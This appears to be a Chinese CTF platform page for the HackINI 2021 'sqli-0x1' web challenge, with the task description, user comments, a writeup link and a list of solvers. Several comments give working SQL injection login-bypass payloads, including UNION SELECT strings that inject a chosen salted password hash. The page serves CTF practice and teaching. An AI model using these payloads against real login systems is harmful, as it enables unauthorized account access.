sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2251
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

...
登录回复
评论
出题人我会一直让你等着 27天前
举报

admin' UNION SELECT 1, 'admin', '21232f297a57a5a743894a0e4a801fc3'# 为什么这个会被检测出来

回复 0
Zpfhh 2月前
举报

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 1
cfggfbfxdgbb 2月前
举报

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0
hengdonghui 3月前
举报

格式是: shellmates{********} 不是flag{******}格式。

回复 0
白乐 3月前
举报

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 3月前
举报

/?pls_help,审计代码

回复 0
Alune 3月前
举报

加盐密码哈希

回复 0
15031597817 6月前
举报

这个登上以后不出flag咋办

回复 1
a543589796 6月前
举报

这道题为什么sqlmap跑不出来啊?

回复 0
lunarbyside 9月前
举报

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4
Systems 1年前
举报

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 4

WriteUp

image
a2cai

2 金币

立即查看

评分(28)

解题动态

小城阿扬 攻破了该题 2小时前
JJagaew 攻破了该题 4小时前
司徒草青 攻破了该题 9小时前
403 攻破了该题 11小时前
CopperKoi 攻破了该题 1天前
qq_2026 攻破了该题 1天前
pwww2020 攻破了该题 1天前
理塘王丁真 攻破了该题 2天前
avaclaire 攻破了该题 2天前
lqc123456 攻破了该题 3天前
nie2004 攻破了该题 3天前
shikamaru 攻破了该题 3天前
noooo 攻破了该题 3天前
sky1 攻破了该题 4天前
shuiniu221 攻破了该题 4天前
evilk 攻破了该题 4天前
7enz 攻破了该题 5天前
mhjmhu 攻破了该题 6天前
leochen 攻破了该题 7天前
KamINanan 攻破了该题 7天前
问题反馈